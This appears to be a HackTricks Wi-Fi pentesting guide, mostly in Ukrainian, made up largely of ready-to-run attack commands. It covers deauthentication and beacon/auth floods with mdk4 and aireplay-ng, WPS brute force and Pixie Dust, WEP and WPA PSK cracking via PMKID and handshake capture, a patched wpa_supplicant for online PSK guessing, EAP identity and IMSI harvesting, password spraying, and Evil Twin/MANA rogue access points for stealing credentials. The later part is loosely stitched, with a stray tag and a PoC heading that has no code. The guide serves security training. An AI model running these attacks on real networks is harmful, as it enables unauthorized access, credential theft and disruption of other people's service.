Pentesting Wifi

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.

Wifi базові команди

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Інструменти

Hijacker & NexMon (вбудований Wi-Fi Android)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Запустити airgeddon за допомогою docker

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Може виконувати атаки Evil Twin, KARMA та Known Beacons, а потім використовувати шаблон phishing для отримання справжнього password мережі або перехоплення social network credentials.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Цей інструмент автоматизує WPS/WEP/WPA-PSK атаки. Він автоматично:

• Переведе інтерфейс у monitor mode
• Сканує можливі мережі - і дозволить вам вибрати жертву(и)
• Якщо WEP - запустить WEP атаки
• Якщо WPA-PSK
• Якщо WPS: Pixie dust attack та bruteforce attack (уважно: brute-force attack може зайняти багато часу). Зауважте, що він не пробує null PIN або database/generated PINs.
• Спробує capture PMKID з AP, щоб crack it
• Спробує deauthenticate клієнтів AP, щоб capture handshake
• Якщо PMKID або Handshake, спробує bruteforce, використовуючи top5000 паролів.

Короткий огляд атак

• DoS
• Deauthentication/disassociation – Відключити всіх (або конкретний ESSID/Client)
• Random fake APs – Приховати мережі, можливий crash сканерів
• Overload AP – Спроба вивести AP з ладу (зазвичай не дуже корисно)
• WIDS – Працювати з IDS
• TKIP, EAPOL – Деякі специфічні атаки для DoS деяких AP
• Cracking
• Crack WEP (several tools and methods)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – Корисно для capture captive portal creds і/або виконання LAN attacks
• WPA-PSK Evil Twin – Корисно для мережевих атак, якщо ви знаєте пароль
• WPA-MGT – Корисно для capture company credentials
• KARMA, MANA, Loud MANA, Known beacon
• + Open – Корисно для capture captive portal creds і/або виконання LAN attacks
• + WPA – Корисно для capture WPA handshakes

Open / OWE networks quick notes

• Passive capture on open SSIDs still works with monitor mode and tcpdump:

iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap

• OWE (Opportunistic Wireless Encryption) виконує обмін ключами для кожної станції (no PSK), тож повітряні кадри шифруються навіть на “open” SSID. Оскільки базується на WPA3, воно також примушує виконання 802.11w PMF, що блокує підроблені deauth/disassoc frames.
• OWE не автентифікує підключення: будь-хто може асоціюватись, тому перевіряйте ізоляцію клієнтів замість довіри маркетинговим заявам. Без ізоляції ARP spoofing або responder-style poisoning на локальному L2 усе ще працює.
• Evil Twin залишається можливим на open/OWE SSID шляхом подання сильнішого сигналу; PMF лише прибирає деавт-«шорткат». Якщо жертви приймуть підроблений TLS cert, повний HTTP(S) MitM відновлюється.
• Broadcast poisoning на open guest Wi‑Fi легко дає creds/hashes (LLMNR/NBT-NS/mDNS). See:

Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

DOS

Deauthentication Packets

Опис з here:.

Deauthentication атаки, поширений метод у Wi‑Fi hacking, передбачають підробку “management” кадрів, щоб примусово відключити пристрої від мережі. Ці нешифровані пакети вводять клієнтів в оману, змушуючи вважати їх від легітимної мережі, що дозволяє нападникам збирати WPA handshakes для cracking або стійко порушувати мережеві з’єднання. Ця тактика, тривожно проста, широко використовується і має суттєві наслідки для безпеки мережі.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 означає deauthentication
• 1 — кількість deauths для відправлення (можна відправити кілька, якщо бажаєте); 0 означає відправляти їх безперервно
• -a 00:14:6C:7E:40:80 — MAC address точки доступу (AP)
• -c 00:0F:B5:34:30:30 — MAC address клієнта для deauthenticate; якщо це опущено — надсилається broadcast deauthentication (працює не завжди)
• ath0 — ім’я інтерфейсу

Disassociation Packets

Disassociation packets, схожі на deauthentication packets, є типом керуючого кадру, що використовується у Wi-Fi мережах. Ці пакети розривають з’єднання між пристроєм (наприклад, ноутбуком або смартфоном) та точкою доступу (AP). Головна відмінність між disassociation і deauthentication полягає в сценаріях їх використання. У той час як AP надсилає deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, перезавантаження або переміщення, що вимагає відключення всіх підключених вузлів.

Цю атаку можна виконати за допомогою mdk4(mode “d”):

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Більше DOS-атак від mdk4

У here.

ATTACK MODE b: Beacon Flooding

Надсилає beacon frames, щоб показати фальшиві APs клієнтам. Іноді це може призвести до збою сканерів мережі і навіть драйверів!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Надсилання authentication frames до всіх доступних Access Points (APs) у зоні дії може перевантажити ці APs, особливо коли задіяно велику кількість клієнтів. Такий інтенсивний трафік може спричинити нестабільність системи, через що деякі APs зависають або навіть перезавантажуються.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) перевіряє, чи SSID правильно відображається, і підтверджує радіус дії AP. Ця техніка, у поєднанні з bruteforcing hidden SSIDs з або без wordlist, допомагає ідентифікувати та отримати доступ до прихованих мереж.

ATTACK MODE m: Michael Countermeasures Exploitation

Відправлення випадкових або дубльованих пакетів у різні черги QoS може спровокувати Michael Countermeasures на TKIP APs, що призведе до одномінутного вимкнення AP. Цей метод є ефективною тактикою атаки DoS (Denial of Service).

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

РЕЖИМ АТАКИ e: EAPOL Start and Logoff Packet Injection

Затоплення AP EAPOL Start frames призводить до створення fake sessions, перевантажуючи AP та блокуючи легітимних клієнтів. Альтернативно, ін’єкція fake EAPOL Logoff messages примусово відключає клієнтів; обидва методи ефективно порушують роботу мережі.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Attacks for IEEE 802.11s mesh networks

Різні атаки на управління лінками та маршрутизацію в mesh-мережах.

ATTACK MODE w: WIDS Confusion

Паралельне підключення клієнтів до кількох WDS-вузлів або фальшивих rogue APs може маніпулювати Intrusion Detection and Prevention Systems, створюючи плутанину та потенційне зловживання системою.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

Packet fuzzer, що включає різноманітні джерела пакетів і повний набір модифікаторів для маніпуляцій із пакетами.

Airggedon

Airgeddon пропонує більшість атак, запропонованих у попередніх коментарях:

WPS

WPS (Wi-Fi Protected Setup) спрощує процес підключення пристроїв до роутера, прискорюючи та полегшуючи налаштування для мереж, зашифрованих за допомогою WPA або WPA2 Personal. Він неефективний для легко зламуної WEP. WPS використовує 8-значний PIN, який перевіряється у двох частинах, що робить його вразливим до brute-force атак через обмежену кількість комбінацій (близько 11 000 можливостей).

WPS Bruteforce

Існують 2 основні інструменти для виконання цієї атаки: Reaver та Bully.

• Reaver був розроблений як надійний та практичний інструмент атаки на WPS і протестований на великій кількості точок доступу та реалізацій WPS.
• Bully — це нова реалізація WPS brute force атаки, написана на C. Має кілька переваг над оригінальним reaver code: менше залежностей, краща робота з пам’яттю та cpu, коректне оброблення порядку байтів (endianness) і більш надійний набір опцій.

Атака експлуатує WPS PIN’s vulnerability, зокрема те, що перші чотири цифри розкриваються, а остання цифра виконує роль контрольної суми, що полегшує brute-force атаку. Проте захисти від brute-force атак, такі як blocking MAC addresses агресивних зловмисників, вимагають MAC address rotation, щоб продовжити атаку.

Отримавши WPS PIN за допомогою інструментів, таких як Bully або Reaver, зловмисник може визначити WPA/WPA2 PSK, забезпечивши постійний доступ до мережі.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Цей вдосконалений підхід націлений на WPS PINs з використанням відомих вразливостей:

1. Pre-discovered PINs: Використовуйте базу даних відомих PINs, пов’язану з конкретними виробниками, які відомі застосуванням уніфікованих WPS PINs. Ця база зіставляє перші три октети MAC-addresses з ймовірними PINs для цих виробників.
2. PIN Generation Algorithms: Використовуйте алгоритми, такі як ComputePIN та EasyBox, які обчислюють WPS PINs на основі MAC-address AP. Алгоритм Arcadyan додатково вимагає device ID, додаючи шар до процесу генерації PIN.

WPS Pixie Dust attack

Dominique Bongard виявив вразливість в деяких Access Points (APs), що стосується створення секретних кодів, відомих як nonces (E-S1 та E-S2). Якщо ці nonces можна визначити, злам WPS PIN пристрою AP стає простим. AP розкриває PIN у спеціальному коді (hash), щоб довести свою легітимність і що він не є підробленим (rogue) AP. Ці nonces по суті є “ключами” для відкриття “сейфу”, що містить WPS PIN. Детальніше про це можна знайти тут.

Простими словами, суть проблеми в тому, що деякі APs не використовували достатньо випадкові ключі для шифрування PIN під час процесу підключення. Це робить PIN вразливим до відгадування з поза мережі (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Якщо ви не хочете переключати пристрій у monitor mode, або reaver та bully мають проблеми, можете спробувати OneShot-C. Цей інструмент може виконувати Pixie Dust attack без переходу в monitor mode.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Деякі погано спроєктовані системи навіть дозволяють Null PIN (порожній або неіснуючий PIN) надати доступ, що досить незвично. Інструмент Reaver здатний перевіряти цю вразливість, на відміну від Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Усі запропоновані WPS-атаки можна легко виконати за допомогою airgeddon.

• 5 та 6 дозволяють спробувати ваш власний PIN (якщо він у вас є)
• 7 та 8 виконують Pixie Dust attack
• 13 дозволяє протестувати NULL PIN
• 11 та 12 recollect the PINs related to the selected AP from available databases та згенерують можливі PINs за допомогою: ComputePIN, EasyBox і опційно Arcadyan (рекомендовано, чому б ні?)
• 9 та 10 протестують кожен можливий PIN

WEP

Чому він вразливий

• RC4 seed — це лише IV (24 bits) + shared key. IV знаходиться у відкритому тексті, дуже малий (2^24) і швидко повторюється, тому ciphertexts з тим самим IV повторно використовують keystream.
• XORing двох ciphertexts з тим самим keystream leaks PlaintextA ⊕ PlaintextB; передбачувані заголовки + RC4 KSA biases (FMS) дозволяють «vote» байти ключа. PTW оптимізує це, використовуючи ARP traffic, щоб знизити вимоги до десятків тисяч пакетів замість мільйонів.
• Integrity — лише CRC32 (linear/unkeyed), тому нападник може перевернути біти та перерахувати CRC32 без ключа → packet forgery/replay/ARP injection в очікуванні IV.

Практичний злам є детермінованим:

airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon  # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap  # PTW attack recovers key once IV threshold is met

Airgeddon все ще постачається з “All-in-One” WEP workflow, якщо ви віддаєте перевагу guided UI.

WPA/WPA2 PSK

PMKID

У 2018 році hashcat revealed описав новий метод атаки, унікальний тим, що йому потрібен лише один пакет і він не вимагає підключених клієнтів до цільової AP — достатньо взаємодії між зловмисником і AP.

Багато сучасних маршрутизаторів додають необов’язкове поле до першого EAPOL фрейму під час асоціації, відоме як Robust Security Network. Воно включає PMKID.

Як пояснює оригінальний пост, PMKID створюється з використанням відомих даних:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Оскільки “PMK Name” є константним, ми знаємо BSSID AP та station, а PMK ідентичний тому з повного 4-way handshake, hashcat може використати цю інформацію, щоб зламати PSK і відновити passphrase!

Щоб gather цю інформацію та локально bruteforce пароль, ви можете зробити:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

PMKIDs captured будуть показані в console і також saved всередині _ /tmp/attack.pcap_
Тепер конвертуйте захоплення у формат hashcat/john і зламайте його:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Зверніть увагу, що формат правильного hash містить 4 частини, наприклад: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Якщо ваш містить лише 3 частини, то він є недійсним (захоплення PMKID було недійсним).

Зауважте, що hcxdumptool також захоплює handshakes (з’явиться приблизно таке: MP:M1M2 RC:63258 EAPOLTIME:17091). Ви можете перетворити ці handshakes у формат hashcat/john за допомогою cap2hccapx

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Я помітив, що деякі handshakes, захоплені цим інструментом, не могли бути cracked навіть при відомому правильному password. Рекомендую, якщо можливо, також захоплювати handshakes традиційним способом або захопити кілька handshakes за допомогою цього інструменту.

Handshake захоплення

Атака на WPA/WPA2 мережі може бути виконана шляхом захоплення handshake і спроби crack пароля offline. Цей процес передбачає моніторинг комунікації конкретної мережі і BSSID на певному channel. Ось стислий посібник:

1. Визначте BSSID, channel, та connected client цільової мережі.
2. Використайте airodump-ng для моніторингу трафіку мережі на вказаному channel і BSSID, у надії захопити handshake. Команда виглядатиме так:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

3. Щоб збільшити шанси на захоплення handshake, тимчасово відключіть клієнта від мережі, щоб змусити його повторно аутентифікуватися. Це можна зробити за допомогою команди aireplay-ng, яка відправляє deauthentication packets клієнту:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Зверніть увагу, що коли client був deauthenticated, він може спробувати підключитися до іншого AP або, в інших випадках, до іншої мережі.

Якщо в airodump-ng з’являється інформація про handshake, це означає, що handshake було захоплено і ви можете припинити прослуховування:

Після того, як handshake захоплено, ви можете crack його за допомогою aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Перевірити, чи є handshake у файлі

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Якщо цей інструмент знайде незавершений handshake певного ESSID раніше за завершений, він не виявить дійсний.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

Швидше онлайн вгадування PSK через wpa_supplicant ctrl socket (no clients/PMKID)

Коли поблизу немає clients і AP відхиляє PMKID, ви можете перебирати PSKs онлайн без перезапуску supplicants:

• Внесіть патч у wpa_supplicant.c, щоб примусово встановити dur = 0; у логіці backoff при помилці автентифікації (біля ssid->auth_failures), що фактично відключає таймер тимчасового відключення.
• Запустіть один демон з control socket:

# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1

wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf

• Керувати ним через інтерфейс управління, повторно використовуючи той самий скан і мережу:

ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED

Невеликий цикл на Python, що читає події сокета (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED), може перевірити ~100 припущень за ~5 хвилин без накладних витрат на сканування. Це все ще шумно й виявляється, але уникає перезапусків процесу для кожної спроби та backoff delays.

WPA Enterprise (MGT)

В корпоративних WiFi-налаштуваннях ви натрапите на різні методи аутентифікації, кожен із яких забезпечує різні рівні безпеки та можливості керування. Коли ви використовуєте інструменти на кшталт airodump-ng для аналізу мережевого трафіку, ви можете помітити ідентифікатори цих типів аутентифікації. До деяких поширених методів належать:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Цей метод підтримує апаратні токени та одноразові паролі всередині EAP-PEAP. На відміну від MSCHAPv2, він не використовує peer challenge і надсилає паролі у відкритому вигляді на точку доступу, що створює ризик для downgrade атак.

2. EAP-MD5 (Message Digest 5):

• Передбачає відправку MD5-хешу пароля від клієнта. Його не рекомендовано через вразливість до словникових атак, відсутність аутентифікації сервера та неможливість генерувати сесійні WEP keys.

3. EAP-TLS (Transport Layer Security):

• Використовує сертифікати на боці клієнта та сервера для аутентифікації і може динамічно генерувати користувацькі та сесійні WEP keys для захисту зв’язку.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Забезпечує взаємну аутентифікацію через зашифрований тунель, а також метод для виведення динамічних, per-user, per-session WEP keys. Потребує лише серверних сертифікатів, клієнти використовують облікові дані.

5. PEAP (Protected Extensible Authentication Protocol):

• Працює аналогічно EAP, створюючи TLS-тунель для захищеної передачі. Дозволяє використовувати слабші протоколи аутентифікації поверх EAP завдяки захисту тунелю.
• PEAP-MSCHAPv2: Часто називають просто PEAP, поєднує вразливий механізм challenge/response MSCHAPv2 із захисним TLS-тунелем.
• PEAP-EAP-TLS (or PEAP-TLS): Схожий на EAP-TLS, але ініціює TLS-тунель перед обміном сертифікатами, додаючи ще один рівень захисту.

You can find more information about these authentication methods here and here.

Username Capture

Читаючи https://tools.ietf.org/html/rfc3748#page-27, виглядає, що якщо ви використовуєте EAP, то “Identity” messages мають бути підтримані, і username буде надсилатися у відкритому вигляді в “Response Identity” повідомленнях.

Навіть використовуючи один із найбільш безпечних методів аутентифікації: PEAP-EAP-TLS, можливе capture the username sent in the EAP protocol. Для цього capture a authentication communication (запустіть airodump-ng на каналі і wireshark в тому ж інтерфейсі) і відфільтруйте пакети поeapol.
Всередині пакета “Response, Identity” з’явиться username клієнта.

Anonymous Identities

Приховування Identity підтримується як EAP-PEAP, так і EAP-TTLS. У контексті WiFi мережі, EAP-Identity запит зазвичай ініціюється точкою доступу (AP) під час процесу асоціації. Щоб забезпечити захист анонімності користувача, відповідь від EAP клієнта на пристрої користувача містить лише мінімальну інформацію, необхідну початковому RADIUS серверу для обробки запиту. Це поняття ілюструється наступними сценаріями:

• EAP-Identity = anonymous
• У цьому сценарії всі користувачі використовують псевдонім “anonymous” як свій ідентифікатор користувача. Початковий RADIUS сервер функціонує як EAP-PEAP або EAP-TTLS сервер, відповідаючи за серверну частину протоколу PEAP або TTLS. Внутрішній (захищений) метод аутентифікації тоді обробляється локально або делегується віддаленому (home) RADIUS серверу.
• EAP-Identity = anonymous@realm_x
• У цій ситуації користувачі з різних realm приховують свої ідентичності, вказуючи лише свої відповідні realm. Це дозволяє початковому RADIUS серверу проксувати EAP-PEAP або EAP-TTLS запити до RADIUS серверів у їхніх home realms, які виступають як PEAP або TTLS сервери. Початковий RADIUS сервер працює виключно як RADIUS relay node.
• Альтернативно, початковий RADIUS сервер може функціонувати як EAP-PEAP або EAP-TTLS сервер і або обробляти захищений метод аутентифікації, або пересилати його на інший сервер. Цей варіант дозволяє налаштовувати відмінні політики для різних realm.

В EAP-PEAP, як тільки TLS-тунель встановлено між PEAP сервером і PEAP клієнтом, PEAP сервер ініціює EAP-Identity запит і передає його через TLS-тунель. Клієнт відповідає на цей другий EAP-Identity запит, надсилаючи EAP-Identity response, що містить справжню ідентичність користувача через зашифрований тунель. Такий підхід ефективно запобігає розкриттю фактичної ідентичності користувача будь-кому, хто прослуховує 802.11 трафік.

EAP-TTLS слідує трохи іншій процедурі. У випадку EAP-TTLS клієнт зазвичай аутентифікується за допомогою PAP або CHAP, захищеними TLS-тунелем. У цьому випадку клієнт включає User-Name атрибут і або Password, або CHAP-Password атрибут у початковому TLS-повідомленні, відправленому після встановлення тунелю.

Незалежно від вибраного протоколу, PEAP/TTLS сервер дізнається справжню ідентичність користувача після встановлення TLS-тунелю. Справжня ідентичність може бути у форматі user@realm або просто user. Якщо PEAP/TTLS сервер також відповідає за аутентифікацію користувача, він тепер має ідентичність користувача і продовжує з методом аутентифікації, захищеним TLS-тунелем. Альтернативно, PEAP/TTLS сервер може переслати новий RADIUS запит на home RADIUS сервер користувача. Цей новий RADIUS запит не містить шару PEAP або TTLS. У випадках, коли захищений метод аутентифікації — EAP, внутрішні EAP повідомлення передаються до home RADIUS сервера без обгортки EAP-PEAP або EAP-TTLS. User-Name атрибут вихідного RADIUS повідомлення містить справжню ідентичність користувача, замінивши anonymous User-Name з вхідного RADIUS запиту. Коли захищений метод аутентифікації — PAP або CHAP (підтримується тільки TTLS), User-Name та інші атрибути аутентифікації, витягнуті з TLS payload, підставляються у вихідному RADIUS повідомленні, заміщаючи anonymous User-Name та TTLS EAP-Message атрибути з вхідного RADIUS запиту.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Примітки:
- Працює до встановлення будь‑якого TLS‑тунелю, якщо розгортання використовує чистий EAP‑SIM/AKA без захищеної ідентичності/псевдонімів.
- Відкрите значення є постійним ідентифікатором, прив'язаним до SIM абонента; його збір дозволяє довготривале відстеження та подальші зловживання в телекомунікаціях.

Вплив
- Privacy: persistent user/device tracking from passive Wi‑Fi captures in public places.
- Telecom abuse bootstrap: with the IMSI, an attacker with SS7/Diameter access can query location or attempt call/SMS interception and MFA theft.

Заходи пом'якшення / на що звертати увагу
- Переконайтесь, що клієнти використовують анонімні зовнішні ідентичності (псевдоніми) для EAP‑SIM/AKA згідно з керівництвом 3GPP (наприклад, 3GPP TS 33.402).
- Віддавати перевагу тунелюванню фази ідентифікації (наприклад, EAP‑TTLS/PEAP з внутрішнім EAP‑SIM/AKA), щоб IMSI ніколи не передавався у відкритому вигляді.
- Пакетні захоплення при асоціації/аутентифікації не повинні розкривати сирий IMSI в EAP-Response/Identity.

Пов'язане: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

Якщо очікується, що клієнт використовуватиме **username and password** (зверніть увагу, що **EAP-TLS won't be valid** у цьому випадку), то ви можете спробувати отримати **list** **usernames** (див. наступну частину) та **passwords** і спробувати **bruteforce** доступ за допомогою [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5